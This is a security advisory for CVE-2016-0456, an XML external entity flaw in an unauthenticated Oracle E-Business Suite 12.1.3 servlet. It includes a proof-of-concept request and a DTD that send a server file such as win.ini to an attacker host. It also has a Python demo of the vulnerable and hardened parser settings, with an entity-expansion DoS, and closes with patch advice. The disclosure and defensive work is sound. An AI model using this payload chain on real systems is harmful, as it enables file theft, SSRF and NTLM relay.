Application: Oracle E-Business Suite
Versions Affected: Oracle E-Business Suite 12.1.3, probably others
Bugs: XXE injection
Vendor response: 24.07.2015
Date of Public Advisory: 19.01.2016
Reference: Oracle CPU Jan 2016
Authors: Nikita Kelesis, Ivan Chalykin, Alexey Tyurin
Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-0456
CVSS Base Score: 5 / 10
AV: Access Vector (Related exploit range): Network (N)
AC: Access Complexity (Required attack complexity): Medium (M)
Au: Authentication (Level of authentication needed to exploit): None (N)
C: Impact to Confidentiality: Partial (P)
I: Impact to Integrity: Partial (P)
A: Impact to Availability: Partial (P)
An attacker can read an arbitrary file on the server by sending a well-formed XML request that references a crafted DTD and then recovering the file content, either from the service's reply or out of band via a server the attacker controls (as in the PoC below).
An attacker can perform a DoS attack (for example, an XML Entity Expansion attack).
An SMB relay attack is a type of man-in-the-middle attack in which the attacker induces the victim to authenticate to a machine the attacker controls and relays that authentication exchange to the real target. The attacker forwards the challenge and response in both directions and ends up with the victim's access. Here the trigger is an external entity whose SYSTEM identifier points at the attacker's host (a UNC path or an HTTP URL that demands NTLM authentication), so it is the account running the E-Business Suite server that authenticates to the attacker.
The XML parser in Oracle E-Business Suite 12.1.3 processes incoming XML requests with whatever DTD the request itself specifies (inline or external), so the entity declarations are under the attacker's control.
Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.
The servlet can be accessed remotely without authentication.
The servlet accepts XML messages that are handed to the XML parser.
The XML parser processes every incoming XML request with the user-specified DTD.
An attacker sends an XML request with a crafted entity declaration and can:
1) read a file from the OS (subject to the permissions of the process running the servlet)
2) perform a DoS attack (entity expansion)
3) make an SSRF (a "tunnel" to local services and the internal network, since the server fetches any URL named in an entity)
4) on Windows hosts: make the server open an SMB or HTTP connection to an attacker host, capture the server account's NTLM challenge-response for offline cracking, or relay it (SMB relay)
To read a local file (the generic, out-of-band way):
1) Run a web server hosting a file (evil.xml) that contains:
<!ENTITY % payload SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://hacker_host:8090/%payload;'>">
2) Listen on a second port (8090 in this example) and wait for the victim's callback: the requested path carries the file content.
3) Send the request to the victim:
POST /OA_HTML/copxmllcmservicecontroller.js HTTP/1.1
Host: <victim_host>
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Content-Length: <length of the body>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker_host/evil.xml">
%remote;
%param1;
]>
<root>&external;</root>

(The request is abbreviated: Host and Content-Length are placeholders. The lines after the ENTITY declaration complete the chain declared in evil.xml: %remote; pulls in the external DTD, %param1; declares the general entity "external" with the contents of the target file embedded in its URL, and the body dereferences it, which makes the server request http://hacker_host:8090/<file content> from the attacker's listener.)
The attack can also be carried out without an attacker-controlled server (with the file content returned in the service's reply), but the request then has to be tailored to each of the servlet's input points.
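The parser behaviour behind the bug, and the configuration that prevents it, as an added example (this is not code from the advisory or from Oracle; it uses Python's xml.sax/expat as a stand-in for the Java parser in E-Business Suite, and the target file and every XML document in it are constructed for the demo). parse_trusting_dtd is the vulnerable setting described above: the DTD supplied in the request is honoured and external general entities are resolved, so the in-band variant of item 1) returns the target file's content, and the nested-entity document from item 2) expands to fanout**depth copies of its leaf. parse_rejecting_dtd aborts on any DOCTYPE, which removes every variant at once. Expat does not expand external parameter entities inside entity values, so the two-stage out-of-band chain from evil.xml is not reproducible with this parser; the example covers the in-band file read and the expansion DoS.

```python
# Added example, not code from the advisory or from Oracle: the parser
# configuration behind CVE-2016-0456 and its fix, reproduced with Python's
# xml.sax (expat) as a stand-in for the E-Business Suite Java parser.
# The target file and all XML documents below are constructed for the demo.
import io
import os
import tempfile
import xml.sax
import xml.sax.handler
from pathlib import Path

class Collector(xml.sax.handler.ContentHandler):
    """Accumulates character data: the parse result a service would later
    echo back to the client (the "reply" in the advisory)."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, data):
        self.parts.append(data)

class RejectDoctype:
    """LexicalHandler that aborts the parse as soon as a DOCTYPE appears,
    before any entity declaration (internal or external) is processed."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE is not allowed in requests: " + name)
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass

def _parse(document, external_entities, lexical_handler):
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, external_entities)
    if lexical_handler is not None:
        parser.setProperty(xml.sax.handler.property_lexical_handler, lexical_handler)
    collector = Collector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.parts)

def parse_trusting_dtd(document: bytes) -> str:
    """Vulnerable configuration: the DTD supplied in the request is honoured
    and external general entities (file://, http://) are resolved."""
    return _parse(document, external_entities=True, lexical_handler=None)

def parse_rejecting_dtd(document: bytes) -> str:
    """Hardened configuration: no external entities and no DOCTYPE at all,
    which closes the file read, SSRF, NTLM relay and entity-expansion cases."""
    return _parse(document, external_entities=False, lexical_handler=RejectDoctype())

def file_read_document(target_uri: str) -> bytes:
    """Same shape as the PoC body, but in-band: an external entity pointing at
    a local file, dereferenced in the root element so the file content becomes
    part of the parsed data."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE root [\n'
        '<!ENTITY secret SYSTEM "%s">\n'
        ']>\n'
        '<root>&secret;</root>\n' % target_uri
    ).encode()

def entity_expansion_document(depth: int = 3, fanout: int = 10) -> bytes:
    """Nested internal entities: each level references the previous one
    `fanout` times, so the final reference expands to fanout**depth copies of
    the leaf ("billion laughs", the DoS named in the advisory)."""
    decls = ['<!ENTITY lol0 "x">']
    for level in range(1, depth + 1):
        decls.append('<!ENTITY lol%d "%s">' % (level, ("&lol%d;" % (level - 1)) * fanout))
    return ('<?xml version="1.0"?>\n<!DOCTYPE root [\n%s\n]>\n<root>&lol%d;</root>\n'
            % ("\n".join(decls), depth)).encode()

def attempt(parse, document: bytes) -> str:
    """Returns the parsed text, or the rejection message if the parser refused."""
    try:
        return parse(document)
    except ValueError as err:
        return "rejected: %s" % err

def demo() -> dict:
    """Runs both parsers over both documents and reports what each yields."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("constructed-secret-token\n")  # stands in for win.ini in the PoC
    try:
        file_doc = file_read_document(Path(f.name).as_uri())
        expansion_doc = entity_expansion_document()
        return {
            "trusting_file_read": attempt(parse_trusting_dtd, file_doc).strip(),
            "rejecting_file_read": attempt(parse_rejecting_dtd, file_doc),
            "trusting_expansion_len": len(attempt(parse_trusting_dtd, expansion_doc)),
            "rejecting_expansion": attempt(parse_rejecting_dtd, expansion_doc),
        }
    finally:
        os.unlink(f.name)

if __name__ == "__main__":
    for key, value in demo().items():
        print("%-24s %s" % (key, value))
```

Run it directly to print the four outcomes; demo() returns them as a dict. Python 3.7.1 and later already disable external general entities by default, which is why the vulnerable parser has to opt in; rejecting the DOCTYPE is the stronger setting because it also stops internal-entity expansion, which the external-entity switch does not touch. The equivalent for a Java parser is the disallow-doctype-decl feature on the parser factory, which is what a fixed servlet should enforce.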
SOLUTIONS AND WORKAROUNDS
Install the Oracle Critical Patch Update of January 2016 (CPU Jan 2016). Until it is applied, restrict network access to the unauthenticated servlet and block outbound HTTP and SMB from the application tier: the out-of-band file read and the NTLM capture/relay both need the server to reach an attacker-controlled host.